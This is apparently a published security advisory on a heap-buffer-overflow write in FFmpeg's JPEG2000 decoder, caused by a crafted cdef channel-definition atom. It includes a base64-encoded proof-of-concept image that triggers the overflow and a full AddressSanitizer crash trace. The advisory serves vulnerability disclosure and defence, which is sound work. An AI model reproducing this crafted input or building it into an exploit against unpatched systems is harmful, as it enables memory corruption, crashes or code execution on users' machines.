FFmpeg - Heap-buffer-overflow write in jpeg2000dec

**security-research** Public

# FFmpeg – Heap-buffer-overflow write in jpeg2000dec

## Package

## Affected versions

## Patched versions

## Description

### Summary

The vulnerability lies in the Channel Definition cdef atom of JPEG2000 which is used to define the mapping of associated components to channels. If a chroma-subsampled pixel format is used together with the cdef atom, a corner case can be triggered. For example, for a YUV420P frame with a 64×32 resolution, the Y component will be 64 _32+16+63=2127 bytes, and the U and V component will be 64_ 32/2+16+63=1103 bytes. By choosing a cdef with cn=0 and asoc=2, the data for the full resolution luma component Y with a height of 32 can be written into the smaller subsampled chroma plane U with a height of 16, thus overflowing the frame buffer picture->data[plane] by 64*16=1024 bytes.

### Severity

High – Allows an attacker to potentially gain remote code execution or cause denial of service.

### Proof of Concept

The following base64 encoded `poc.jp2` triggers the ASAN panic below:

“`
AAAADGpQICANCocKAAAAFGZ0eXBqcDIgAAAAAGpwMiAAAABJanAyaAAAABZpaGRyAAAAIAAAAEAA AwgHAAAAAAAPY29scgEAAAAAABIAAAAcY2RlZgADAAAAAAACAAEAAAACAAIAAAACAAAAympwMmP/ T/9RAC8AAAAAAEAAAAAgAAAAAAAAAAAQAAAAEAAAAAAAAAAAAAAAAAMHAQEHAgIHAgL/UgAMAAAA AQAGAgIAAf9cABYgQEhIUEhIUEhIUEhIUEhIUEhIUP+QAAoAAAAAAGcAAf+T32gQCYf/AAgH/wAI BwAAAKHzggABuwAAp9oMC0FzRGLwAACj6gkACchYhMatzBLXAACh848AZRCkKnPzhveC/MUI/qlg AACx+oF/UCiMWOlqioxY6WqKAAD/2Q==
“`

ASAN panic:

“`
==1929947==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x51a0000106cf at pc 0x5643c58b5858 bp 0x7fe552bfe410 sp 0x7fe552bfe408 WRITE of size 1 at 0x51a0000106cf thread T1 (av:jpeg200:df0) #0 0x5643c58b5857 in write_frame_8 libavcodec/jpeg2000dec.c:2368:1 #1 0x5643c58b5857 in jpeg2000_decode_tile libavcodec/jpeg2000dec.c:2389:9 #2 0x5643c51560ad in avcodec_default_execute2 libavcodec/avcodec.c:92:17 #3 0x5643c58ae7d7 in jpeg2000_decode_frame libavcodec/jpeg2000dec.c:2903:5 #4 0x5643c53b03f4 in decode_simple_internal libavcodec/decode.c:439:16 #5 0x5643c53b03f4 in decode_simple_receive_frame libavcodec/decode.c:597:15 #6 0x5643c53b03f4 in ff_decode_receive_frame_internal libavcodec/decode.c:633:15 #7 0x5643c5ca20dc in frame_worker_thread libavcodec/pthread_frame.c:295:19 #8 0x5643c424855a in asan_thread_start(void*) asan_interceptors.cpp.o #9 0x7fe555a33b7a in start_thread nptl/pthread_create.c:448:8 #10 0x7fe555ab17b7 in __GI___clone3 misc/../sysdeps/unix/sysv/linux/x86_64/clone3.S:78 0x51a0000106cf is located 0 bytes after 1103-byte region [0x51a000010280,0x51a0000106cf) allocated by thread T1 (av:jpeg200:df0) here: #0 0x5643c424b70b in posix_memalign #1 0x5643c774c426 in av_malloc libavutil/mem.c:107:9 #2 0x5643c7702fd7 in av_buffer_alloc libavutil/buffer.c:82:12 #3 0x5643c7702fd7 in av_buffer_allocz libavutil/buffer.c:95:24 #4 0x5643c7705007 in pool_alloc_buffer libavutil/buffer.c:369:26 #5 0x5643c7705007 in av_buffer_pool_get libavutil/buffer.c:407:15 #6 0x5643c5650349 in video_get_buffer libavcodec/get_buffer.c:233:23 #7 0x5643c5650349 in avcodec_default_get_buffer2 libavcodec/get_buffer.c:285:16 #8 0x5643c53b76d4 in ff_get_buffer libavcodec/decode.c:1683:11 #9 0x5643c5ca1781 in thread_get_buffer_internal libavcodec/pthread_frame.c:1041:11 #10 0x5643c5ca1781 in ff_thread_get_buffer libavcodec/pthread_frame.c:1050:15 #11 0x5643c58aceed in jpeg2000_decode_frame libavcodec/jpeg2000dec.c:2882:16 #12 0x5643c53b03f4 in decode_simple_internal libavcodec/decode.c:439:16 #13 0x5643c53b03f4 in decode_simple_receive_frame libavcodec/decode.c:597:15 #14 0x5643c53b03f4 in ff_decode_receive_frame_internal libavcodec/decode.c:633:15 #15 0x5643c5ca20dc in frame_worker_thread libavcodec/pthread_frame.c:295:19 #16 0x5643c424855a in asan_thread_start(void*) asan_interceptors.cpp.o Thread T1 (av:jpeg200:df0) created by T0 here: #0 0x5643c4230115 in pthread_create #1 0x5643c40df235 in init_thread libavcodec/pthread_frame.c:912:11 #2 0x5643c40deaa8 in ff_frame_thread_init libavcodec/pthread_frame.c:971:15 #3 0x5643c5156d2f in avcodec_open2 libavcodec/avcodec.c:328:15 #4 0x5643c428e011 in dec_open fftools/ffmpeg_dec.c:1601:16 #5 0x5643c428ced0 in dec_init fftools/ffmpeg_dec.c:1666:11 #6 0x5643c4296c28 in ist_use fftools/ffmpeg_demux.c:993:15 #7 0x5643c429720b in ist_filter_add fftools/ffmpeg_demux.c:1029:11 #8 0x5643c42b0b10 in ifilter_bind_ist fftools/ffmpeg_filter.c:685:11 #9 0x5643c42b06b4 in fg_create_simple fftools/ffmpeg_filter.c:1234:11 #10 0x5643c42d704e in ost_bind_filter fftools/ffmpeg_mux_init.c:1000:15 #11 0x5643c42d1a99 in ost_add fftools/ffmpeg_mux_init.c:1536:15 #12 0x5643c42cf1e5 in map_auto_video fftools/ffmpeg_mux_init.c:1640:16 #13 0x5643c42c5b37 in create_streams fftools/ffmpeg_mux_init.c:1969:19 #14 0x5643c42c5b37 in of_open fftools/ffmpeg_mux_init.c:3335:11 #15 0x5643c42db146 in open_files fftools/ffmpeg_opt.c:1367:15 #16 0x5643c42db146 in ffmpeg_parse_options fftools/ffmpeg_opt.c:1423:11 #17 0x5643c431c06f in main fftools/ffmpeg.c:991:11 #18 0x7fe5559caca7 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
“`

### Timeline

**Date reported**: 08/04/2025

**Date fixed**: 08/06/2025

**Date disclosed**: 09/08/2025

Recent posts